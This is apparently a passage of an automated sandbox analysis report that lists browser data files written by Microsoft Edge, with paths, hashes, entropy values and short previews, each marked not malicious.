                                                                                                                                                            SSDEEP:12:7/4hvYfYebvqBQFUtNw/zauy5JfYebvqBvJ:7/sYfYebvZgN64JfYebvk
                                                                                                                                                            MD5:D7B1B0876BFF8196290668D91AAC777B
                                                                                                                                                            SHA1:9C08019561AE0795380B8627A050528011CB68EF
                                                                                                                                                            SHA-256:CCF8522BD1B627FC86704300A9294AA31E93BCCB435FABEF382CFB567941956A
                                                                                                                                                            SHA-512:6A0244DBC704B47DEBA76E4D890C094517DC9E77A220F98147C903389FEE11EF459D4AEF2217AFC03D6D6A1C166BCBAB9789C93B7899C5F7A1F4FCA83DD7AF9B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.256 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:04:59.257 10e0 Recovering log #3.2025/01/06-17:04:59.260 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):432
                                                                                                                                                            Entropy (8bit):5.2311617054034425
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/4hvYfYebvqBQFUtNw/zauy5JfYebvqBvJ:7/sYfYebvZgN64JfYebvk
                                                                                                                                                            MD5:D7B1B0876BFF8196290668D91AAC777B
                                                                                                                                                            SHA1:9C08019561AE0795380B8627A050528011CB68EF
                                                                                                                                                            SHA-256:CCF8522BD1B627FC86704300A9294AA31E93BCCB435FABEF382CFB567941956A
                                                                                                                                                            SHA-512:6A0244DBC704B47DEBA76E4D890C094517DC9E77A220F98147C903389FEE11EF459D4AEF2217AFC03D6D6A1C166BCBAB9789C93B7899C5F7A1F4FCA83DD7AF9B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:59.256 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/01/06-17:04:59.257 10e0 Recovering log #3.2025/01/06-17:04:59.260 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2521504a-b9fe-4864-9532-4613c9781700.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40
                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\49b90564-51cf-4e1e-be4e-ab5b8bb75017.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):193
                                                                                                                                                            Entropy (8bit):4.864047146590611
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:YHpoueH2a9a1o3/QBR70S7PMVKJTnMRK3VY:YH/u2caq3QH7E4T3y
                                                                                                                                                            MD5:18D8AE83268DD3A59C64AAD659CF2FD3
                                                                                                                                                            SHA1:018C9736438D095A67B1C9953082F671C2FDB681
                                                                                                                                                            SHA-256:D659029D35ADEBB7918AF32FFF3202C63D8047043A8BDF329B2A97751CF95056
                                                                                                                                                            SHA-512:BB0962F930E9844E8C0E9CD209C07F46259E4C7677D5443B7AEE90DCF7B7E8F9960C5E3FCB8A83B9BB40862FBE0442C547083A9FD421D86674B88B2BEBBEB2FB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Reporting and NEL

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 4, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36864
                                                                                                                                                            Entropy (8bit):0.555790634850688
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:TsIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB:QIEumQv8m1ccnvS6
                                                                                                                                                            MD5:0247E46DE79B6CD1BF08CAF7782F7793
                                                                                                                                                            SHA1:B3A63ED5BE3D8EC6E3949FC5E2D21D97ACC873A6
                                                                                                                                                            SHA-256:AAD0053186875205E014AB98AE8C18A6233CB715DD3AF44E7E8EB259AEAB5EEA
                                                                                                                                                            SHA-512:148804598D2A9EA182BD2ADC71663D481F88683CE3D672CE12A43E53B0D34FD70458BE5AAA781B20833E963804E7F4562855F2D18F7731B7C2EAEA5D6D52FBB6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}.........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF39df6.TMP (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40
                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):36864
                                                                                                                                                            Entropy (8bit):0.36515621748816035
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:TLH3lIIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:Tb31DtX5nDOvyKDhU1cSB
                                                                                                                                                            MD5:25363ADC3C9D98BAD1A33D0792405CBF
                                                                                                                                                            SHA1:D06E343087D86EF1A06F7479D81B26C90A60B5C3
                                                                                                                                                            SHA-256:6E019B8B9E389216D5BDF1F2FE63F41EF98E71DA101F2A6BE04F41CC5954532D
                                                                                                                                                            SHA-512:CF7EEE35D0E00945AF221BEC531E8BF06C08880DA00BD103FA561BC069D7C6F955CBA3C1C152A4884601E5A670B7487D39B4AE9A4D554ED8C14F129A74E555F7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......X..g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c73c02b4-b429-4cb1-989e-5a752d9edf14.tmp

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2
                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[]

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):80
                                                                                                                                                            Entropy (8bit):3.4921535629071894
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                            MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                            SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                            SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                            SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):420
                                                                                                                                                            Entropy (8bit):5.198536577962994
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/p0gOvYfYebvqBZFUtNp06/zp0RFZ5JfYebvqBaJ:7/mgMYfYebvygNmgmjLJfYebvL
                                                                                                                                                            MD5:B658B4A737148C329FB12A516B38C37B
                                                                                                                                                            SHA1:B23C734079C0B39E287C77B7F3B17D686BEE6701
                                                                                                                                                            SHA-256:DC876E9814D44E3DA3DBD7A733EAAA667B6E3440054BC15F2D811207779DE2EC
                                                                                                                                                            SHA-512:B55130E331AB005D6F0168FCEB07C2544E4D16476ABCD850DF502D12E45C0DD97C18F7FFAD23259F61B39EC156FD65FB49B014918D2CE3070CA210CD6FB2393B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:15.329 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/06-17:05:15.330 10e0 Recovering log #3.2025/01/06-17:05:15.333 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):420
                                                                                                                                                            Entropy (8bit):5.198536577962994
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:7/p0gOvYfYebvqBZFUtNp06/zp0RFZ5JfYebvqBaJ:7/mgMYfYebvygNmgmjLJfYebvL
                                                                                                                                                            MD5:B658B4A737148C329FB12A516B38C37B
                                                                                                                                                            SHA1:B23C734079C0B39E287C77B7F3B17D686BEE6701
                                                                                                                                                            SHA-256:DC876E9814D44E3DA3DBD7A733EAAA667B6E3440054BC15F2D811207779DE2EC
                                                                                                                                                            SHA-512:B55130E331AB005D6F0168FCEB07C2544E4D16476ABCD850DF502D12E45C0DD97C18F7FFAD23259F61B39EC156FD65FB49B014918D2CE3070CA210CD6FB2393B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:05:15.329 10e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/01/06-17:05:15.330 10e0 Recovering log #3.2025/01/06-17:05:15.333 10e0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):326
                                                                                                                                                            Entropy (8bit):5.245420116150527
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/UX+q2Pwkn23oH+TcwtpIFUtNUzXAZmwzUzXwVkwOwkn23oH+Tcwta/WLJ:7/UuvYfYebmFUtNUk/zUE5JfYebaUJ
                                                                                                                                                            MD5:9C81A23A59463EB59A76BED73603660F
                                                                                                                                                            SHA1:75C4B8541373DFCED28CE4976818B8F2EFA0EB25
                                                                                                                                                            SHA-256:FA88CF3119008093C6147EE75D7EA9700FC2FA732922E9C54703072F9A073FE2
                                                                                                                                                            SHA-512:0124962FC4AE61A27634882F23128EAED3B21F247AEEE764EE9EE0B380ABE234E6379544C63F5865A22AAC30AF7DDFAA47A4CEC8AAAA2A7FCE45BB9A1D8478FC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.386 1218 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/06-17:04:58.387 1218 Recovering log #3.2025/01/06-17:04:58.387 1218 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):326
                                                                                                                                                            Entropy (8bit):5.245420116150527
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:iO/UX+q2Pwkn23oH+TcwtpIFUtNUzXAZmwzUzXwVkwOwkn23oH+Tcwta/WLJ:7/UuvYfYebmFUtNUk/zUE5JfYebaUJ
                                                                                                                                                            MD5:9C81A23A59463EB59A76BED73603660F
                                                                                                                                                            SHA1:75C4B8541373DFCED28CE4976818B8F2EFA0EB25
                                                                                                                                                            SHA-256:FA88CF3119008093C6147EE75D7EA9700FC2FA732922E9C54703072F9A073FE2
                                                                                                                                                            SHA-512:0124962FC4AE61A27634882F23128EAED3B21F247AEEE764EE9EE0B380ABE234E6379544C63F5865A22AAC30AF7DDFAA47A4CEC8AAAA2A7FCE45BB9A1D8478FC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:2025/01/06-17:04:58.386 1218 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/01/06-17:04:58.387 1218 Recovering log #3.2025/01/06-17:04:58.387 1218 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Top Sites

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 7, 1st free page 5, free pages 2, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):28672
                                                                                                                                                            Entropy (8bit):0.26707851465859517
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:TLPp5yN8h6MvDOH+FxOUwa5qVZ7Nkl25Pe2d:TLh8Gxk+6Uwc8NlYC
                                                                                                                                                            MD5:04F8B790DF73BD7CD01238F4681C3F44
                                                                                                                                                            SHA1:DF12D0A21935FC01B36A24BF72AB9640FEBB2077
                                                                                                                                                            SHA-256:96BD789329E46DD9D83002DC40676922A48A3601BF4B5D7376748B34ECE247A0
                                                                                                                                                            SHA-512:0DD492C371D310121F7FD57D29F8CE92AA2536A74923AC27F9C4C0C1580C849D7779348FC80410DEBB5EEE14F357EBDF33BF670D1E7B6CCDF15D69AC127AB7C3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g.......j.j................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 89, cookie 0x66, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):184320
                                                                                                                                                            Entropy (8bit):1.0672123235125275
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:QSqzWMMUfTFnGCTjHbRJkkqtXaWTK+hGgH+6e7EHVumYjun6:QrzWMffBnzkkqtXnTK+hNH+5EVumt
                                                                                                                                                            MD5:8015A053BDD9EE878B4CBBC3778378D1
                                                                                                                                                            SHA1:774DE519A2F9564FC26A71C101F065C6D9F8DF96
                                                                                                                                                            SHA-256:ECE1B2E349D120BB9AF0275768C146B05C267D625401A3D85FD37D50F0E1B0F2
                                                                                                                                                            SHA-512:A0EE463995CA2B9187B2E82911874AF68182744080D21022BA6A17109CDB15FF3E0607B0BC6B6118182CA1BE83AB5AA27BD380CA1DE91CFB7326C66A30843F88
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ .......Y...........f......................................................j............O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 7, cookie 0xb, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14336
                                                                                                                                                            Entropy (8bit):0.7836182415564406
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:LLqlCouxhK3thdkSdj5QjUsEGcGBXp22iSBgm+xjgm:uOK3tjkSdj5IUltGhp22iSBgm+xj/
                                                                                                                                                            MD5:AA9965434F66985F0979719F3035C6E1
                                                                                                                                                            SHA1:39FC31CBB2BB4F8FA8FB6C34154FB48FBCBAEEF4
                                                                                                                                                            SHA-256:F42877E694E9AFC76E1BBA279F6EC259E28A7E7C574EFDCC15D58EFAE06ECA09
                                                                                                                                                            SHA-512:201667EAA3DF7DBCCF296DE6FCF4E79897C1BB744E29EF37235C44821A18EAD78697DFEB9253AA01C0DC28E5758E2AF50852685CDC9ECA1010DBAEE642590CEA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..................n..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40960
                                                                                                                                                            Entropy (8bit):0.466449324575039
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0YQCv:v7doKsKuKZKlZNmu46yjx0BCv
                                                                                                                                                            MD5:685581485950DFB1E5B783A4E760062F
                                                                                                                                                            SHA1:315AFB63CF48145B75CEEB73A732C456A14A8218
                                                                                                                                                            SHA-256:71DF05713C31AAE816F9EECFD0EBCEDF73E3E75FE6C34B919F7B30266A3D99B4
                                                                                                                                                            SHA-512:11F4FE81BE479259FB7A8A1A6929099A018EA5B007115E92D10FA8CB2CE39C4FF7E62722358A43B6B845758C5A9E91C15BC850D8F64F4BC1184C8C074021D3B9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11755
                                                                                                                                                            Entropy (8bit):5.190465908239046
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
                                                                                                                                                            MD5:07301A857C41B5854E6F84CA00B81EA0
                                                                                                                                                            SHA1:7441FC1018508FF4F3DBAA139A21634C08ED979C
                                                                                                                                                            SHA-256:2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
                                                                                                                                                            SHA-512:00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
                                                                                                                                                            Malicious:false
